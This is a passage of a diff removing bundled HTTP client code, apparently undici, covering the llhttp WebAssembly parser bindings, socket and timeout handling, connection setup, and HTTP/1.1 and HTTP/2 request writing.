- mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) - } - - return await WebAssembly.instantiate(mod, { - env: { - /* eslint-disable camelcase */ - - wasm_on_url: (p, at, len) => { - /* istanbul ignore next */ - return 0 - }, - wasm_on_status: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_begin: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageBegin() || 0 - }, - wasm_on_header_field: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_header_value: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 - }, - wasm_on_body: (p, at, len) => { - assert.strictEqual(currentParser.ptr, p) - const start = at - currentBufferPtr + currentBufferRef.byteOffset - return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 - }, - wasm_on_message_complete: (p) => { - assert.strictEqual(currentParser.ptr, p) - return currentParser.onMessageComplete() || 0 - } - - /* eslint-enable camelcase */ - } - }) -} - -let llhttpInstance = null -let llhttpPromise = lazyllhttp() -llhttpPromise.catch() - -let currentParser = null -let currentBufferRef = null -let currentBufferSize = 0 -let currentBufferPtr = null - -const 
TIMEOUT_HEADERS = 1 -const TIMEOUT_BODY = 2 -const TIMEOUT_IDLE = 3 - -class Parser { - constructor (client, socket, { exports }) { - assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) - - this.llhttp = exports - this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) - this.client = client - this.socket = socket - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - this.statusCode = null - this.statusText = '' - this.upgrade = false - this.headers = [] - this.headersSize = 0 - this.headersMaxSize = client[kMaxHeadersSize] - this.shouldKeepAlive = false - this.paused = false - this.resume = this.resume.bind(this) - - this.bytesRead = 0 - - this.keepAlive = '' - this.contentLength = '' - this.connection = '' - this.maxResponseSize = client[kMaxResponseSize] - } - - setTimeout (value, type) { - this.timeoutType = type - if (value !== this.timeoutValue) { - timers.clearTimeout(this.timeout) - if (value) { - this.timeout = timers.setTimeout(onParserTimeout, value, this) - // istanbul ignore else: only for jest - if (this.timeout.unref) { - this.timeout.unref() - } - } else { - this.timeout = null - } - this.timeoutValue = value - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - } - - resume () { - if (this.socket.destroyed || !this.paused) { - return - } - - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_resume(this.ptr) - - assert(this.timeoutType === TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - this.paused = false - this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. 
- this.readMore() - } - - readMore () { - while (!this.paused && this.ptr) { - const chunk = this.socket.read() - if (chunk === null) { - break - } - this.execute(chunk) - } - } - - execute (data) { - assert(this.ptr != null) - assert(currentParser == null) - assert(!this.paused) - - const { socket, llhttp } = this - - if (data.length > currentBufferSize) { - if (currentBufferPtr) { - llhttp.free(currentBufferPtr) - } - currentBufferSize = Math.ceil(data.length / 4096) * 4096 - currentBufferPtr = llhttp.malloc(currentBufferSize) - } - - new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) - - // Call `execute` on the wasm parser. - // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, - // and finally the length of bytes to parse. - // The return value is an error code or `constants.ERROR.OK`. - try { - let ret - - try { - currentBufferRef = data - currentParser = this - ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) - /* eslint-disable-next-line no-useless-catch */ - } catch (err) { - /* istanbul ignore next: difficult to make a test case for */ - throw err - } finally { - currentParser = null - currentBufferRef = null - } - - const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr - - if (ret === constants.ERROR.PAUSED_UPGRADE) { - this.onUpgrade(data.slice(offset)) - } else if (ret === constants.ERROR.PAUSED) { - this.paused = true - socket.unshift(data.slice(offset)) - } else if (ret !== constants.ERROR.OK) { - const ptr = llhttp.llhttp_get_error_reason(this.ptr) - let message = '' - /* istanbul ignore else: difficult to make a test case for */ - if (ptr) { - const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) - message = - 'Response does not match the HTTP/1.1 protocol (' + - Buffer.from(llhttp.memory.buffer, ptr, len).toString() + - ')' - } - throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) - } - } catch (err) { - 
util.destroy(socket, err) - } - } - - destroy () { - assert(this.ptr != null) - assert(currentParser == null) - - this.llhttp.llhttp_free(this.ptr) - this.ptr = null - - timers.clearTimeout(this.timeout) - this.timeout = null - this.timeoutValue = null - this.timeoutType = null - - this.paused = false - } - - onStatus (buf) { - this.statusText = buf.toString() - } - - onMessageBegin () { - const { socket, client } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - if (!request) { - return -1 - } - } - - onHeaderField (buf) { - const len = this.headers.length - - if ((len & 1) === 0) { - this.headers.push(buf) - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - this.trackHeader(buf.length) - } - - onHeaderValue (buf) { - let len = this.headers.length - - if ((len & 1) === 1) { - this.headers.push(buf) - len += 1 - } else { - this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) - } - - const key = this.headers[len - 2] - if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { - this.keepAlive += buf.toString() - } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { - this.connection += buf.toString() - } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { - this.contentLength += buf.toString() - } - - this.trackHeader(buf.length) - } - - trackHeader (len) { - this.headersSize += len - if (this.headersSize >= this.headersMaxSize) { - util.destroy(this.socket, new HeadersOverflowError()) - } - } - - onUpgrade (head) { - const { upgrade, client, socket, headers, statusCode } = this - - assert(upgrade) - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(!socket.destroyed) - assert(socket === client[kSocket]) - assert(!this.paused) - assert(request.upgrade || request.method === 'CONNECT') - - 
this.statusCode = null - this.statusText = '' - this.shouldKeepAlive = null - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - socket.unshift(head) - - socket[kParser].destroy() - socket[kParser] = null - - socket[kClient] = null - socket[kError] = null - socket - .removeListener('error', onSocketError) - .removeListener('readable', onSocketReadable) - .removeListener('end', onSocketEnd) - .removeListener('close', onSocketClose) - - client[kSocket] = null - client[kQueue][client[kRunningIdx]++] = null - client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) - - try { - request.onUpgrade(statusCode, headers, socket) - } catch (err) { - util.destroy(socket, err) - } - - resume(client) - } - - onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { - const { client, socket, headers, statusText } = this - - /* istanbul ignore next: difficult to make a test case for */ - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - - /* istanbul ignore next: difficult to make a test case for */ - if (!request) { - return -1 - } - - assert(!this.upgrade) - assert(this.statusCode < 200) - - if (statusCode === 100) { - util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) - return -1 - } - - /* this can only happen if server is misbehaving */ - if (upgrade && !request.upgrade) { - util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) - return -1 - } - - assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) - - this.statusCode = statusCode - this.shouldKeepAlive = ( - shouldKeepAlive || - // Override llhttp value which does not allow keepAlive for HEAD. - (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') - ) - - if (this.statusCode >= 200) { - const bodyTimeout = request.bodyTimeout != null - ? 
request.bodyTimeout - : client[kBodyTimeout] - this.setTimeout(bodyTimeout, TIMEOUT_BODY) - } else if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - if (request.method === 'CONNECT') { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - if (upgrade) { - assert(client[kRunning] === 1) - this.upgrade = true - return 2 - } - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (this.shouldKeepAlive && client[kPipelining]) { - const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null - - if (keepAliveTimeout != null) { - const timeout = Math.min( - keepAliveTimeout - client[kKeepAliveTimeoutThreshold], - client[kKeepAliveMaxTimeout] - ) - if (timeout <= 0) { - socket[kReset] = true - } else { - client[kKeepAliveTimeoutValue] = timeout - } - } else { - client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] - } - } else { - // Stop more requests from being dispatched. - socket[kReset] = true - } - - const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false - - if (request.aborted) { - return -1 - } - - if (request.method === 'HEAD') { - return 1 - } - - if (statusCode < 200) { - return 1 - } - - if (socket[kBlocking]) { - socket[kBlocking] = false - resume(client) - } - - return pause ? 
constants.ERROR.PAUSED : 0 - } - - onBody (buf) { - const { client, socket, statusCode, maxResponseSize } = this - - if (socket.destroyed) { - return -1 - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert.strictEqual(this.timeoutType, TIMEOUT_BODY) - if (this.timeout) { - // istanbul ignore else: only for jest - if (this.timeout.refresh) { - this.timeout.refresh() - } - } - - assert(statusCode >= 200) - - if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { - util.destroy(socket, new ResponseExceededMaxSizeError()) - return -1 - } - - this.bytesRead += buf.length - - if (request.onData(buf) === false) { - return constants.ERROR.PAUSED - } - } - - onMessageComplete () { - const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this - - if (socket.destroyed && (!statusCode || shouldKeepAlive)) { - return -1 - } - - if (upgrade) { - return - } - - const request = client[kQueue][client[kRunningIdx]] - assert(request) - - assert(statusCode >= 100) - - this.statusCode = null - this.statusText = '' - this.bytesRead = 0 - this.contentLength = '' - this.keepAlive = '' - this.connection = '' - - assert(this.headers.length % 2 === 0) - this.headers = [] - this.headersSize = 0 - - if (statusCode < 200) { - return - } - - /* istanbul ignore next: should be handled by llhttp? */ - if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { - util.destroy(socket, new ResponseContentLengthMismatchError()) - return -1 - } - - request.onComplete(headers) - - client[kQueue][client[kRunningIdx]++] = null - - if (socket[kWriting]) { - assert.strictEqual(client[kRunning], 0) - // Response completed before request. 
- util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (!shouldKeepAlive) { - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (socket[kReset] && client[kRunning] === 0) { - // Destroy socket once all requests have completed. - // The request at the tail of the pipeline is the one - // that requested reset and no further requests should - // have been queued since then. - util.destroy(socket, new InformationalError('reset')) - return constants.ERROR.PAUSED - } else if (client[kPipelining] === 1) { - // We must wait a full event loop cycle to reuse this socket to make sure - // that non-spec compliant servers are not closing the connection even if they - // said they won't. - setImmediate(resume, client) - } else { - resume(client) - } - } -} - -function onParserTimeout (parser) { - const { socket, timeoutType, client } = parser - - /* istanbul ignore else */ - if (timeoutType === TIMEOUT_HEADERS) { - if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { - assert(!parser.paused, 'cannot be paused while waiting for headers') - util.destroy(socket, new HeadersTimeoutError()) - } - } else if (timeoutType === TIMEOUT_BODY) { - if (!parser.paused) { - util.destroy(socket, new BodyTimeoutError()) - } - } else if (timeoutType === TIMEOUT_IDLE) { - assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) - util.destroy(socket, new InformationalError('socket idle timeout')) - } -} - -function onSocketReadable () { - const { [kParser]: parser } = this - if (parser) { - parser.readMore() - } -} - -function onSocketError (err) { - const { [kClient]: client, [kParser]: parser } = this - - assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') - - if (client[kHTTPConnVersion] !== 'h2') { - // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded - // to the user. 
- if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so for as a valid response. - parser.onMessageComplete() - return - } - } - - this[kError] = err - - onError(this[kClient], err) -} - -function onError (client, err) { - if ( - client[kRunning] === 0 && - err.code !== 'UND_ERR_INFO' && - err.code !== 'UND_ERR_SOCKET' - ) { - // Error is not caused by running request and not a recoverable - // socket error. - - assert(client[kPendingIdx] === client[kRunningIdx]) - - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) - } - assert(client[kSize] === 0) - } -} - -function onSocketEnd () { - const { [kParser]: parser, [kClient]: client } = this - - if (client[kHTTPConnVersion] !== 'h2') { - if (parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - return - } - } - - util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) -} - -function onSocketClose () { - const { [kClient]: client, [kParser]: parser } = this - - if (client[kHTTPConnVersion] === 'h1' && parser) { - if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { - // We treat all incoming data so far as a valid response. - parser.onMessageComplete() - } - - this[kParser].destroy() - this[kParser] = null - } - - const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) - - client[kSocket] = null - - if (client.destroyed) { - assert(client[kPending] === 0) - - // Fail entire queue. - const requests = client[kQueue].splice(client[kRunningIdx]) - for (let i = 0; i < requests.length; i++) { - const request = requests[i] - errorRequest(client, request, err) - } - } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { - // Fail head of pipeline. 
- const request = client[kQueue][client[kRunningIdx]] - client[kQueue][client[kRunningIdx]++] = null - - errorRequest(client, request, err) - } - - client[kPendingIdx] = client[kRunningIdx] - - assert(client[kRunning] === 0) - - client.emit('disconnect', client[kUrl], [client], err) - - resume(client) -} - -async function connect (client) { - assert(!client[kConnecting]) - assert(!client[kSocket]) - - let { host, hostname, protocol, port } = client[kUrl] - - // Resolve ipv6 - if (hostname[0] === '[') { - const idx = hostname.indexOf(']') - - assert(idx !== -1) - const ip = hostname.substring(1, idx) - - assert(net.isIP(ip)) - hostname = ip - } - - client[kConnecting] = true - - if (channels.beforeConnect.hasSubscribers) { - channels.beforeConnect.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector] - }) - } - - try { - const socket = await new Promise((resolve, reject) => { - client[kConnector]({ - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, (err, socket) => { - if (err) { - reject(err) - } else { - resolve(socket) - } - }) - }) - - if (client.destroyed) { - util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) - return - } - - client[kConnecting] = false - - assert(socket) - - const isH2 = socket.alpnProtocol === 'h2' - if (isH2) { - if (!h2ExperimentalWarned) { - h2ExperimentalWarned = true - process.emitWarning('H2 support is experimental, expect them to change at any time.', { - code: 'UNDICI-H2' - }) - } - - const session = http2.connect(client[kUrl], { - createConnection: () => socket, - peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams - }) - - client[kHTTPConnVersion] = 'h2' - session[kClient] = client - session[kSocket] = socket - session.on('error', onHttp2SessionError) - session.on('frameError', onHttp2FrameError) - 
session.on('end', onHttp2SessionEnd) - session.on('goaway', onHTTP2GoAway) - session.on('close', onSocketClose) - session.unref() - - client[kHTTP2Session] = session - socket[kHTTP2Session] = session - } else { - if (!llhttpInstance) { - llhttpInstance = await llhttpPromise - llhttpPromise = null - } - - socket[kNoRef] = false - socket[kWriting] = false - socket[kReset] = false - socket[kBlocking] = false - socket[kParser] = new Parser(client, socket, llhttpInstance) - } - - socket[kCounter] = 0 - socket[kMaxRequests] = client[kMaxRequests] - socket[kClient] = client - socket[kError] = null - - socket - .on('error', onSocketError) - .on('readable', onSocketReadable) - .on('end', onSocketEnd) - .on('close', onSocketClose) - - client[kSocket] = socket - - if (channels.connected.hasSubscribers) { - channels.connected.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - socket - }) - } - client.emit('connect', client[kUrl], [client]) - } catch (err) { - if (client.destroyed) { - return - } - - client[kConnecting] = false - - if (channels.connectError.hasSubscribers) { - channels.connectError.publish({ - connectParams: { - host, - hostname, - protocol, - port, - servername: client[kServerName], - localAddress: client[kLocalAddress] - }, - connector: client[kConnector], - error: err - }) - } - - if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { - assert(client[kRunning] === 0) - while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { - const request = client[kQueue][client[kPendingIdx]++] - errorRequest(client, request, err) - } - } else { - onError(client, err) - } - - client.emit('connectionError', client[kUrl], [client], err) - } - - resume(client) -} - -function emitDrain (client) { - client[kNeedDrain] = 0 - client.emit('drain', client[kUrl], [client]) -} - -function resume (client, sync) { 
- if (client[kResuming] === 2) { - return - } - - client[kResuming] = 2 - - _resume(client, sync) - client[kResuming] = 0 - - if (client[kRunningIdx] > 256) { - client[kQueue].splice(0, client[kRunningIdx]) - client[kPendingIdx] -= client[kRunningIdx] - client[kRunningIdx] = 0 - } -} - -function _resume (client, sync) { - while (true) { - if (client.destroyed) { - assert(client[kPending] === 0) - return - } - - if (client[kClosedResolve] && !client[kSize]) { - client[kClosedResolve]() - client[kClosedResolve] = null - return - } - - const socket = client[kSocket] - - if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { - if (client[kSize] === 0) { - if (!socket[kNoRef] && socket.unref) { - socket.unref() - socket[kNoRef] = true - } - } else if (socket[kNoRef] && socket.ref) { - socket.ref() - socket[kNoRef] = false - } - - if (client[kSize] === 0) { - if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { - socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) - } - } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { - if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { - const request = client[kQueue][client[kRunningIdx]] - const headersTimeout = request.headersTimeout != null - ? 
request.headersTimeout - : client[kHeadersTimeout] - socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) - } - } - } - - if (client[kBusy]) { - client[kNeedDrain] = 2 - } else if (client[kNeedDrain] === 2) { - if (sync) { - client[kNeedDrain] = 1 - process.nextTick(emitDrain, client) - } else { - emitDrain(client) - } - continue - } - - if (client[kPending] === 0) { - return - } - - if (client[kRunning] >= (client[kPipelining] || 1)) { - return - } - - const request = client[kQueue][client[kPendingIdx]] - - if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { - if (client[kRunning] > 0) { - return - } - - client[kServerName] = request.servername - - if (socket && socket.servername !== request.servername) { - util.destroy(socket, new InformationalError('servername changed')) - return - } - } - - if (client[kConnecting]) { - return - } - - if (!socket && !client[kHTTP2Session]) { - connect(client) - return - } - - if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { - return - } - - if (client[kRunning] > 0 && !request.idempotent) { - // Non-idempotent request cannot be retried. - // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { - // Don't dispatch an upgrade until all preceding requests have completed. - // A misbehaving server might upgrade the connection before all pipelined - // request has completed. - return - } - - if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && - (util.isStream(request.body) || util.isAsyncIterable(request.body))) { - // Request with stream or iterator body can error while other requests - // are inflight and indirectly error those as well. - // Ensure this doesn't happen by waiting for inflight - // to complete before dispatching. - - // Request with stream or iterator body cannot be retried. 
- // Ensure that no other requests are inflight and - // could cause failure. - return - } - - if (!request.aborted && write(client, request)) { - client[kPendingIdx]++ - } else { - client[kQueue].splice(client[kPendingIdx], 1) - } - } -} - -// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 -function shouldSendContentLength (method) { - return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' -} - -function write (client, request) { - if (client[kHTTPConnVersion] === 'h2') { - writeH2(client, client[kHTTP2Session], request) - return - } - - const { body, method, path, host, upgrade, headers, blocking, reset } = request - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - const bodyLength = util.bodyLength(body) - - let contentLength = bodyLength - - if (contentLength === null) { - contentLength = request.contentLength - } - - if (contentLength === 0 && !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. - - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. 
- if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - const socket = client[kSocket] - - try { - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - - util.destroy(socket, new InformationalError('aborted')) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - if (method === 'HEAD') { - // https://github.com/mcollina/undici/issues/258 - // Close after a HEAD request to interop with misbehaving servers - // that may send a body in the response. - - socket[kReset] = true - } - - if (upgrade || method === 'CONNECT') { - // On CONNECT or upgrade, block pipeline from dispatching further - // requests on this connection. 
- - socket[kReset] = true - } - - if (reset != null) { - socket[kReset] = reset - } - - if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { - socket[kReset] = true - } - - if (blocking) { - socket[kBlocking] = true - } - - let header = `${method} ${path} HTTP/1.1\r\n` - - if (typeof host === 'string') { - header += `host: ${host}\r\n` - } else { - header += client[kHostHeader] - } - - if (upgrade) { - header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` - } else if (client[kPipelining] && !socket[kReset]) { - header += 'connection: keep-alive\r\n' - } else { - header += 'connection: close\r\n' - } - - if (headers) { - header += headers - } - - if (channels.sendHeaders.hasSubscribers) { - channels.sendHeaders.publish({ request, headers: header, socket }) - } - - /* istanbul ignore else: assertion */ - if (!body || bodyLength === 0) { - if (contentLength === 0) { - socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') - } else { - assert(contentLength === null, 'no body must not have content length') - socket.write(`${header}\r\n`, 'latin1') - } - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - - socket.cork() - socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') - socket.write(body) - socket.uncork() - request.onBodySent(body) - request.onRequestSent() - if (!expectsPayload) { - socket[kReset] = true - } - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) - } else { - writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) - } - } else if (util.isStream(body)) { - writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) - } else if (util.isIterable(body)) { - writeIterable({ body, client, request, socket, contentLength, 
header, expectsPayload }) - } else { - assert(false) - } - - return true -} - -function writeH2 (client, session, request) { - const { body, method, path, host, upgrade, expectContinue, signal, headers: reqHeaders } = request - - let headers - if (typeof reqHeaders === 'string') headers = Request[kHTTP2CopyHeaders](reqHeaders.trim()) - else headers = reqHeaders - - if (upgrade) { - errorRequest(client, request, new Error('Upgrade not supported for H2')) - return false - } - - try { - // TODO(HTTP/2): Should we call onConnect immediately or on stream ready event? - request.onConnect((err) => { - if (request.aborted || request.completed) { - return - } - - errorRequest(client, request, err || new RequestAbortedError()) - }) - } catch (err) { - errorRequest(client, request, err) - } - - if (request.aborted) { - return false - } - - /** @type {import('node:http2').ClientHttp2Stream} */ - let stream - const h2State = client[kHTTP2SessionState] - - headers[HTTP2_HEADER_AUTHORITY] = host || client[kHost] - headers[HTTP2_HEADER_METHOD] = method - - if (method === 'CONNECT') { - session.ref() - // we are already connected, streams are pending, first request - // will create a new stream. 
We trigger a request to create the stream and wait until - // `ready` event is triggered - // We disabled endStream to allow the user to write to the stream - stream = session.request(headers, { endStream: false, signal }) - - if (stream.id && !stream.pending) { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - } else { - stream.once('ready', () => { - request.onUpgrade(null, null, stream) - ++h2State.openStreams - }) - } - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) session.unref() - }) - - return true - } - - // https://tools.ietf.org/html/rfc7540#section-8.3 - // :path and :scheme headers must be omited when sending CONNECT - - headers[HTTP2_HEADER_PATH] = path - headers[HTTP2_HEADER_SCHEME] = 'https' - - // https://tools.ietf.org/html/rfc7231#section-4.3.1 - // https://tools.ietf.org/html/rfc7231#section-4.3.2 - // https://tools.ietf.org/html/rfc7231#section-4.3.5 - - // Sending a payload body on a request that does not - // expect it can cause undefined behavior on some - // servers and corrupt connection state. Do not - // re-use the connection for further requests. - - const expectsPayload = ( - method === 'PUT' || - method === 'POST' || - method === 'PATCH' - ) - - if (body && typeof body.read === 'function') { - // Try to read EOF in order to get length. - body.read(0) - } - - let contentLength = util.bodyLength(body) - - if (contentLength == null) { - contentLength = request.contentLength - } - - if (contentLength === 0 || !expectsPayload) { - // https://tools.ietf.org/html/rfc7230#section-3.3.2 - // A user agent SHOULD NOT send a Content-Length header field when - // the request message does not contain a payload body and the method - // semantics do not anticipate such a body. 
- - contentLength = null - } - - // https://github.com/nodejs/undici/issues/2046 - // A user agent may send a Content-Length header with 0 value, this should be allowed. - if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { - if (client[kStrictContentLength]) { - errorRequest(client, request, new RequestContentLengthMismatchError()) - return false - } - - process.emitWarning(new RequestContentLengthMismatchError()) - } - - if (contentLength != null) { - assert(body, 'no body must not have content length') - headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` - } - - session.ref() - - const shouldEndStream = method === 'GET' || method === 'HEAD' - if (expectContinue) { - headers[HTTP2_HEADER_EXPECT] = '100-continue' - stream = session.request(headers, { endStream: shouldEndStream, signal }) - - stream.once('continue', writeBodyH2) - } else { - stream = session.request(headers, { - endStream: shouldEndStream, - signal - }) - writeBodyH2() - } - - // Increment counter as we have new several streams open - ++h2State.openStreams - - stream.once('response', headers => { - const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers - - if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { - stream.pause() - } - }) - - stream.once('end', () => { - request.onComplete([]) - }) - - stream.on('data', (chunk) => { - if (request.onData(chunk) === false) { - stream.pause() - } - }) - - stream.once('close', () => { - h2State.openStreams -= 1 - // TODO(HTTP/2): unref only if current streams count is 0 - if (h2State.openStreams === 0) { - session.unref() - } - }) - - stream.once('error', function (err) { - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - stream.once('frameError', (type, code) => { - const err = new 
InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) - errorRequest(client, request, err) - - if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { - h2State.streams -= 1 - util.destroy(stream, err) - } - }) - - // stream.on('aborted', () => { - // // TODO(HTTP/2): Support aborted - // }) - - // stream.on('timeout', () => { - // // TODO(HTTP/2): Support timeout - // }) - - // stream.on('push', headers => { - // // TODO(HTTP/2): Suppor push - // }) - - // stream.on('trailers', headers => { - // // TODO(HTTP/2): Support trailers - // }) - - return true - - function writeBodyH2 () { - /* istanbul ignore else: assertion */ - if (!body) { - request.onRequestSent() - } else if (util.isBuffer(body)) { - assert(contentLength === body.byteLength, 'buffer body must have content length') - stream.cork() - stream.write(body) - stream.uncork() - stream.end() - request.onBodySent(body) - request.onRequestSent() - } else if (util.isBlobLike(body)) { - if (typeof body.stream === 'function') { - writeIterable({ - client, - request, - contentLength, - h2stream: stream, - expectsPayload, - body: body.stream(), - socket: client[kSocket], - header: '' - }) - } else { - writeBlob({ - body, - client, - request, - contentLength, - expectsPayload, - h2stream: stream, - header: '', - socket: client[kSocket] - }) - } - } else if (util.isStream(body)) { - writeStream({ - body, - client, - request, - contentLength, - expectsPayload, - socket: client[kSocket], - h2stream: 